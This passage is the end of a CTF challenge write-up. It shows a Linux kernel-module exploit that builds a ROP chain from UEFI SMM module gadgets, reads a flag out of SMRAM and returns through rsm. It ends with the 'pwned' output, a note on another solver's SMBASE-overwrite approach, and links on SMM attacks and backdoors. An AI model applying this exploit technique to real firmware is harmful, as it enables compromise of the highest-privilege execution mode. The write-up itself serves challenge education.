0x000000007FFEF000ull #define CorCtfSmmBase 0x0007FF9C000ull #define DumpHere COMM_BUFFER uint64_t pop_rcx_rbp = PiSmmCpuDxeSmmBase + 0x0001044d; //: pop rcx ; pop rbx ; ret ; uint64_t pop_rax_rbx = PiSmmCpuDxeSmmBase + 0x000105dc; //: pop rax ; pop rbx ; ret ; uint64_t mov_ptr_rcx_rax = PiSmmCpuDxeSmmBase + 0x0000fee5; //: mov qword [rcx], rax ; ret ; uint64_t load_rax_gadget = PiSmmCoreBase + 0x0000110f; // : mov rax, qword [rdi] ; sub rsi, rdx ; add rax, rsi ; ret ; uint64_t pop_rdx_rsi_rdi = PiSmmCoreBase + 0x000019cd; // : pop rdx ; pop rsi ; pop rdi ; ret ; uint64_t pop_rdi = PiSmmCoreBase + 0x000019cd + 2; uint64_t ropnop = PiSmmCoreBase + 0x000019cd + 3; uint64_t rsm = PiSmmCpuDxeSmmBase + 0x000fe89; uint64_t flag_addr = CorCtfSmmBase + 0x0002bbc; static int init_exploit(void) { printk(KERN_INFO "beginning exploit\n"); map_reserved(); send_gadget(pop_rdx_rsi_rdi, 0, 0); send_gadget(0, flag_addr, 1); send_gadget(load_rax_gadget, pop_rcx_rbp, 2); send_gadget(DumpHere, 0, 3); send_gadget(mov_ptr_rcx_rax, ropnop, 4); send_gadget(pop_rdi, flag_addr + 8, 5); send_gadget(load_rax_gadget, pop_rcx_rbp, 6); send_gadget(pop_rdi, flag_addr + 8, 7); send_gadget(load_rax_gadget, pop_rcx_rbp, 8); send_gadget(DumpHere + 8, 0, 9); send_gadget(mov_ptr_rcx_rax, ropnop, 10); send_gadget(pop_rdi, flag_addr + 16, 11); send_gadget(load_rax_gadget, pop_rcx_rbp, 12); send_gadget(DumpHere + 16, 0, 13); send_gadget(mov_ptr_rcx_rax, ropnop, 14); send_gadget(pop_rdi, flag_addr + 24, 15); send_gadget(load_rax_gadget, pop_rcx_rbp, 16); send_gadget(DumpHere + 24, 0, 17); send_gadget(mov_ptr_rcx_rax, ropnop, 18); send_gadget(rsm, 0, 19); dump_all_notes(0x7ffb6ae8); printk("found SMM flag: %s\n", comm_buffer); return 0; } static void cleanup_exploit(void) { unmap_reserved(); printk(KERN_INFO "leaving exploit\n"); } module_init(init_exploit); module_exit(cleanup_exploit);

Running the exploit results in:

Ring -2 has been pwned!

Overall, SMM is quite an interesting target for exploitation and potential backdoors, especially given just how high its privileges are. During the CTF, 7 teams managed to solve this, which was around what I expected for a medium challenge in corCTF’s pwn category. I must mention that zhuyifei1999 had quite an interesting strategy I have heard about in real world SMM exploits that avoided ROP as he ended up overwriting SMBASE to be outside SMRAM to control of the entry point (but then had to deal with the pain of transitioning from 16 to 32 bit).

As promised, here are some other interesting SMM links I have read through when making this challenge:

https://www.welivesecurity.com/2022/04/19/when-secure-isnt-secure-uefi-vulnerabilities-lenovo-consumer-laptops/

https://dreamlayers.blogspot.com/2012/10/dumping-smram.html

http://blog.cr4.sh/2015/07/building-reliable-smm-backdoor-for-uefi.html

https://bostonglobalforum.org/cyber/overall/exploiting-smm-callout-vulnerabilities-in-lenovo-firmware/

https://www.synacktiv.com/en/publications/through-the-smm-class-and-a-vulnerability-found-there

https://hardwear.io/netherlands-2021/presentation/automated-vulnerability-hunting-in-SMM.pdf

https://research.nccgroup.com/2023/03/15/a-race-to-report-a-toctou-analysis-of-a-bug-collision-in-intel-smm/

https://research.nccgroup.com/2023/04/11/stepping-insyde-system-management-mode/

https://dannyodler.medium.com/attacking-the-golden-ring-on-amd-mini-pc-b7bfb217b437

Feel free to point out any mistakes or ask questions about this writeup!